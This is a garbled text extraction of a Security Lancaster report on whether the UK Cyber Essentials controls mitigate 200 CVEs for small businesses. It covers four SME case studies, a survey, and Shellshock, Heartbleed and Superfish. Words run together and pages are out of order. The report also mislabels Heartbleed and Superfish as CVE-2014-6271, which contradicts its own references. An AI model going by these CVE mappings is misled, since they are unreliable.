CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally the data collected from the surveyis analysed and used to develop a general-case network model the SME networks arecompared to this to better understand thenuances of each market sector as well theoverall typical configuration of SMEs
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from2013 and 2014 deemed as applicable tothe study and chosen for analysis 131vulnerabilities were mitigated with the useof the Cyber Essentials Security Tools 61vulnerabilities were partially mitigated and 8were not mitigated
Figure 4 Percentage of Full Vulnerabilities ListMitigated
Partially Mitigated 59 of the 61 CVEsjudged as partially mitigated are as suchbecause they rely of patches from third-party software or hardware vendors butthat will be mitigated once a security fixhas been released Despite any level ofsecurity tools being deployed on a network thesecurity involved in using third party softwareunfortunately relies on the vendorrsquos ability toidentify potential areas of risk as well asto quickly respond to security breaches as
they become apparent with the release ofpatches All software installed on an SMEnetwork should be periodically reviewed todecide whether it is necessary - or if thereare more suitable and potentially more securesolutions available
The other two partially mitigatedvulnerabilities rely on website blacklistingcombined with avoiding vulnerable webbrowser software A secure configurationwithout such a browser would mitigate thisvulnerability but as in the Web DevelopmentSME case study it may not always be possibleto avoid the use of a specific software pieceIn a case as this website blacklisting is theonly defence against the vulnerabilities
Not Mitigated - Secure ConfigurationSome vulnerabilities have been found to beunmitigatable using the CE controls in each ofthe found cases this is due to inherent flaws ina hardware device or software that can not befixed by a security patch or firmware update
For these devices that are fundamentallyflawed from a cyber-security stand-point itcan be that no level of security tools on top ofthe network can aid in mitigation - rather thehardware should be replaced to ensure networksecurity It may be possible for a public list ofall such devices to be developed as part of thegovernment cyber-security scheme - to serveas a device-blacklist for SMEs
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentialscontrols may be assessed Some detail on thephysical structure usage and existing securityof each network is provided
bull SME Network One represents a financespecialist SME using a combination ofexternally managed services for bankingin addition to internal remotely accessibleinternal services for employees
bull SME Network Two represents a specialistSME utilizing an off-site remotely managedserver for administrator services and cloud-based services for employees
bull SME Network Three represents a webservices SME that accesses client serversfrequently and utilises cloud-basedservices daily
bull SME Network Four represents a hospitalityservices provider with a very smallcompany network co-located with a verylarge guest network component where allof the services are remotely managed andlocated
SME Network One - Finance Sector
Physical Infrastructure The companyinterviewed comprised around 20 employeeslocated at 3 sites nationally
Remote workers connect over normalinternet connections both residential andcommercial and use both VPN and non-VPNtraffic (specifically web traffic on port 80) toaccess services supplied by the company
Figure 5 SME-1 Network
The hardware at the head office (wherethe interview was carried out) consists ofequipment by 3Com Draytek BT and Heuwaifor infrastructure components Employees usea range of machines bought between 2011and 2014 comprising a mix of Dell and LenovoPCs
As most of the infrastructure is passive(most of the traffic is handled by a single3Com BaseT-1000 switch) the firmware onthe equipment is unchanged from purchase ifany firmware is present at all
Services At the head office site a WindowsFile Server (SAMBA) server provides local filesharing and allows remote users to accessthe same files via VPN The mail servera Microsoft Exchange Server is an off-sitedeployment managed by an external companybut is a dedicated server for only this company
Additionally a web service and databaseserver is run from a server at the site Thisprovides both local HTTP access to thedatabase it runs as well as having firewallrules put in place to allow external access tothe same system for off-site employees
Numerous other pieces of banking softwareare run on bank-owned remote servers andare accessed and secured via combinationsof smart cards and PIN entry devices alsosupplied by the banks
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 6 of 28
User Access Employees are permitted toaccess the internet from both their individualworkstations and additional devices such assmart phones (although technically this is notpermitted by policy but this policy is notstrictly enforced) Internet access is howeverslightly filtered with access to Facebook beingblocked by the router
Access logs for any network operations arenot created and any machine in the office canaccess the network with no isolated islands
User accounts can be migrated betweenmachines via a Domain Controller but inpractice this is unlikely to actually happenwith users generally using their own machines
Operating systems Locally everything isWindows 7 the remote site uses Windows7 2 remote machines are Windows 81
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 119 wereapplicable to the first SME network
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SMEs operationsare done via browser-based interfaces to otherfinancial companies (such as banks) it placesthem in the firing line for a large number ofthe browser based attacks Furthermore assome banks require specific browser versionsfor their interfaces to work they end upwith several different browsers with severalversions of each to cover all their requirementsopening them up multiple times to browser-based vectors
Additionally the heavy use of SSL-basedcommunication places them in a positionwhere any SSL vulnerabilities affect them too
SME Network Two - Specialist Group
Physical Infrastructure The second SMEparticipant employs 20-25 based acrossmultiple offices in one building
Employees may bring their own devices oruse a workstation provided Workstations areconnected to one of four switches via Ethernetand share a virtual LAN with other employeedevices An off-site server containing sensitivedata is accessible only to administrators viaSSH
Network Equipment includes an externalDell PowerEdge Server four TPLink SwitchAccess Points and a TPLink DHCP Router
Figure 7 SME-2 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows XP Windows 7 amp Windows 8 withauto-updates enabled
Some Employee use of VPN to connectto another network for a data service Allother services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and may use theirown equipment Administrators often accessa remote server database and file store actingas a web server Guests may access a separateWi-Fi network through the same access pointsas other office workers but do not sharethe same virtual LAN as employees Wi-Fiaccess logs are gathered but no other useractivity Employees can access the networkfrom any machine but the SMErsquos policy isthat all machines should have anti-malwareand strong passwords which are recommendedto be changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilitiesOf the 200 listed vulnerabilities 79 wereapplicable to the second SME network
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overallpotential vulnerabilities largely owed toa higher reliance on cloud-based servicesAlthough this reduces the risk from inherentvulnerability in a network responsibility ishanded onto the service provider chosen Acertified and reputable cloud services providershould thus be sought to ensure protectionthrough the entire chain
SME Network Three - Web Development
Physical Infrastructure SME-3 employs 10workers based in one building
Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices
Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router
Figure 9 SME-3 Network
Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled
All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily
User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing
Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
